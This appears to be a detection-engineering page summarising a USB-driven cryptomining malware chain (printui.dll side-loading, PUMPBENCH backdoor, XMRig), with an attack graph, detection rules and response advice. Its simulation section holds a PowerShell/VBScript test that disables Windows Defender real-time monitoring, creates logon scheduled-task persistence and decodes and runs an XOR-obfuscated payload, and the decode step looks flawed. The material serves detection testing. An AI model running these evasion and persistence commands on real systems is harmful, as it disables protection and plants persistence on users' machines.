Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The report details a USB-driven infection campaign that leverages malicious shortcut files to deliver a multi-stage malware chain for cryptocurrency mining. Initial execution side-loads a DLL named printui.dll from a fake System32 directory, then hands off to a dropper (CUTFAIL), further deploying a downloader (HIGHREPS) and a backdoor (PUMPBENCH). The PUMPBENCH backdoor communicates with a PostgreSQL server to fetch additional payloads and ultimately launches XMRig miners. The operation maintains persistence through Windows Defender exclusions, scheduled tasks, and rogue services.
Analysis
Mandiant researchers deconstructed the kill chain and highlighted four core malware families: DIRTYBULK, CUTFAIL, HIGHREPS, and PUMPBENCH. They captured the actors’ file naming patterns, the DLL side-loading abuse of printui.dll, registry changes, and associated network indicators. The analysis also charted persistence techniques, including scheduled tasks and services linked to the DCOMLaunch Service Group.
Mitigation
Recommended defenses include blocking execution of shortcut files originating from removable media, monitoring for commands that add Windows Defender exclusions, detecting suspicious printui.dll side-loading activity, and hunting for services or scheduled tasks that use random six-digit names. Applying network controls against known malicious domains and DoH resolvers can further limit command-and-control channels.
Response
Once detected, isolate the impacted host, remove the malicious DLL and related components, delete the offensive scheduled task and service entries, and restore Windows Defender settings by clearing exclusions. Perform comprehensive forensic scanning to uncover residual payloads and track connections to the identified PostgreSQL C2 infrastructure. Finally, update detection content to cover the observed command-line usage and file creation behaviors.
“`mermaid graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef file fill:#ffff99 classDef process fill:#ff9999 classDef service fill:#ccffcc classDef command fill:#dddddd classDef malware fill:#ffb6c1 %% Initial infection via removable media node_usb_insert[“<b>Action</b> – <b>T1674 Input Injection</b>: Victim inserts USB containing malicious shortcut”] class node_usb_insert action node_lnk[“<b>File</b> – <b>Malicious Shortcut</b> (USB Drive.lnk)”] class node_lnk file node_wscript[“<b>Tool</b> – <b>wscript.exe</b>: Executes VBScript”] class node_wscript tool node_vbs[“<b>File</b> – <b>VBScript</b> (x??????.vbs)”] class node_vbs file node_shortcut_mod[“<b>Action</b> – <b>T1547.009 Shortcut Modification</b>: LNK used for persistence”] class node_shortcut_mod action %% Masquerading and side‑loading node_masq_dir[“<b>File</b> – <b>Fake Directory</b> C:\\Windows<space>\\System32 (trailing space)”] class node_masq_dir file node_printui_exe[“<b>Process</b> – <b>printui.exe</b> (legitimate)”] class node_printui_exe process node_printui_dll[“<b>File</b> – <b>printui.dll</b> (malicious)”] class node_printui_dll file node_dll_hijack[“<b>Action</b> – <b>T1574.001 Hijack Execution Flow: DLL</b>”] class node_dll_hijack action %% Defense evasion via PowerShell profile node_ps_exclusion[“<b>Command</b> – Add‑MpPreference -ExclusionPath \”C:\\Windows <space>\””] class node_ps_exclusion command node_ps_profile[“<b>Action</b> – <b>T1546.013 PowerShell Profile</b>: Executes exclusion command”] class node_ps_profile action %% Persistence through service and scheduled task node_service_create[“<b>Action</b> – <b>T1543.003 Create Windows Service</b>”] class node_service_create action node_service[“<b>Service</b> – <b>123456</b> created under DcomLaunch with ServiceDll”] class node_service service node_scheduled_task[“<b>Command</b> – schtasks /create /tn \”console_zero\” /sc ONLOGON /tr \”C:\\Windows\\System32\\console_zero.exe\” /rl HIGHEST /f”] class node_scheduled_task command node_task_action[“<b>Action</b> – <b>T1037.001 Logon Script</b>: Runs console_zero.exe on user logon”] class node_task_action action %% C2 resolution via DoH and fast flux node_doh[“<b>Tool</b> – DNS‑over‑HTTPS queries to dns.google”] class node_doh tool node_fastflux[“<b>Action</b> – <b>T1568.001 Fast Flux DNS</b> and <b>T1568.003 DNS Calculation</b>”] class node_fastflux action %% Resource hijacking – cryptocurrency mining node_xmrig[“<b>Malware</b> – XMRig miner”] class node_xmrig malware node_mining[“<b>Action</b> – <b>T1496.001 Resource Hijacking</b>: Cryptomining on compromised host”] class node_mining action %% Connections node_usb_insert –>|contains| node_lnk node_lnk –>|executes| node_wscript node_wscript –>|runs| node_vbs node_vbs –>|creates masquerading directory| node_masq_dir node_vbs –>|copies legitimate executable| node_printui_exe node_vbs –>|replaces DLL with malicious version| node_printui_dll node_printui_exe –>|loads| node_dll_hijack node_dll_hijack –>|loads malicious DLL| node_printui_dll node_printui_dll –>|triggers| node_ps_exclusion node_ps_exclusion –>|executed via| node_ps_profile node_ps_profile –>|creates| node_service_create node_service_create –>|creates| node_service node_service –>|enables| node_scheduled_task node_scheduled_task –>|runs on logon| node_task_action node_task_action –>|downloads C2 address via| node_doh node_doh –>|uses| node_fastflux node_fastflux –>|provides address for| node_xmrig node_xmrig –>|executes| node_mining “`
Attack Flow
Detections
Abnormal Space Count in Process Name / Command Line / File Path (via cmdline)
View
LOLBAS WScript / CScript (via process_creation)
View
Suspicious Defender Exclusions Modification (via cmdline)
View
Possible Copy and Rename System Executable for Evasion (via cmdline)
View
Disable Windows Defender Realtime Monitoring and Other Preferences Changes (via cmdline)
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
-
Stage 1 – Drop malicious VBScript on the compromised USB drive (e.g.,
E:\payload.vbs). The script disables Windows Defender real‑time protection usingAdd‑MpPreference, encrypts a payload with an XOR routine, and creates a scheduled task for persistence. -
Stage 2 – Execute the script via
wscript.exepassing the persistence command line directly (to satisfy the rule’s conjunctive condition). -
Stage 3 – The script internally invokes PowerShell to run the encrypted payload, demonstrating the “infection chain”.
-
Stage 4 – After execution, the attacker cleans up artifacts (removes the script, deletes the scheduled task).
-
-
Regression Test Script:
# ------------------------------------------------------------ # Regression Test – Malware Infection Chain Simulation # ------------------------------------------------------------ $scriptPath = "$env:TEMP\payload.vbs" $taskName = "WinUpdateTask" $xorKey = 0x5A # -- 1. Create XOR‑encrypted dummy payload -------------------------------- $plainPayload = "calc.exe" $bytes = [System.Text.Encoding]::Unicode.GetBytes($plainPayload) for ($i = 0; $i -lt $bytes.Length; $i++) { $bytes[$i] = $bytes[$i] -bxor $xorKey } $encrypted = [Convert]::ToBase64String($bytes) # -- 2. Write malicious VBScript ------------------------------------------- @" ' Malicious VBScript – infection chain Set sh = CreateObject("WScript.Shell") ' Disable real‑time protection sh.Run "powershell -Command `"Add-MpPreference -DisableRealtimeMonitoring $true`"", 0, True ' Create scheduled task for persistence sh.Run "schtasks /Create /SC ONLOGON /TN $taskName /TR `"powershell -EncodedCommand $([Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('Start-Process `"$env:windir\system32\cmd.exe`" /c echo $encrypted ^| powershell -EncodedCommand'))`"", 0, True ' Decrypt and execute payload Dim encData, decData, i encData = "$encrypted" decData = "" For i = 1 To Len(encData) Step 4 ch = ChrW(CInt("&H" & Mid(encData, i, 4)) Xor $xorKey) decData = decData & ch Next sh.Run decData, 0, False "@ | Set-Content -Encoding ASCII $scriptPath # -- 3. Execute the script via wscript.exe (triggers the rule) ------------- wscript.exe "$scriptPath" /B # -- 4. (Optional) Wait a few seconds for the task to fire ---------------- Start-Sleep -Seconds 10 # ------------------------------------------------------------ # Cleanup – remove script and scheduled task # ------------------------------------------------------------ Remove-Item $scriptPath -Force schtasks /Delete /TN $taskName /F -
Cleanup Commands:
# Remove residual scheduled task (if still present) schtasks /Delete /TN "WinUpdateTask" /F # Remove any lingering script files Remove-Item "$env:TEMP\payload.vbs" -ErrorAction SilentlyContinue # Re‑enable real‑time protection powershell -Command "Add-MpPreference -DisableRealtimeMonitoring $false"